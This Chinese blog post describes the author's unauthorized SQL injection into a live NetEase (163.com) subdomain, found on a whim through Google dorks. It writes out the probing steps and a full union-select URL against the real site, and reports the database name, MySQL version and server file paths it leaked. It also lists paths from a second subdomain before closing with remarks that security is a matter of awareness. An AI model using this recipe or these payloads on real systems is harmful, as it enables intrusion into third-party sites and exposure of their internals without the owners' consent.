从163分站sql injection注入漏洞浅谈安全

昨天闲的蛋疼

在hao123找了个站,就决定是163了

主站基本没路,找分站。

GOOGLE:site:163.com一会就找到一个叫双喜的分站

继续GOOGLE:site:shuangxi.163.com inurl:.php?id=

找啊找啊找啊找,找到一个sql injection注入点

然后又and 1=1;and 1=2;order by 7,union select 1,2,3,4,5,6,7

http://shuangxi.163.com/story.php?id=7%20and%201=2%20union%20select%201,user(),@@version,4,database(),6,7

[email protected]

database:sales

version:4.0.26-log

/home2/www/minisite/2010/0813/shuangxi/include/test.inc.php

/home/www/minisite/include/uploadpic_new.inc.php

 

————————————————————————————————————————

其实,泄露就是这么简单

http://canon.163.com/index1.php

/home2/www/minisite/2008/0509/canon/include/init.inc.php

include_path='.:/usr/local/lib/php

/home/www/minisite/include/uploadpic.inc.php

 

身为举世瞩目的网易,分站居然是如此不堪

http://wooyun.org/corps/%E7%BD%91%E6%98%93

深入这个探究下此问题

究竟是安全工作师太菜、太懒;

还是脚本程序员太不注重安全

都不是!

没有建立起一套可行、完善的系统,团队、人员没有足够明智的安全意识  

这才是你们缺的

按白门楼兄弟的一句话:安全是有由什么决定的,意识!(兄弟,我注明了版权了,不要扔拖鞋)

即使有再完美的防火墙、再卓越的IDS、技术再高超的安全工程师(伪黑客);

你丝毫没有利用这可利用的珍贵资源,没有发挥这安全工程师该发挥的水平,没有时刻注意安全方面的问题

那又起什么作用呢,说不定哪天你们沦陷就是因为一个弱口令

记得有一次有个不要命的兄弟接天 涯的单子,也让我帮他看了一下,某重要地方弱口令...(此处省略100W个字)

 

大牛直接看下面,小菜全部看完!

 

小弟的意思是:

安全是意识!

 

 

关注51cto.com,关注seclufei

 

 

你可能感兴趣的:(安全,163,网易,意识,注入漏洞)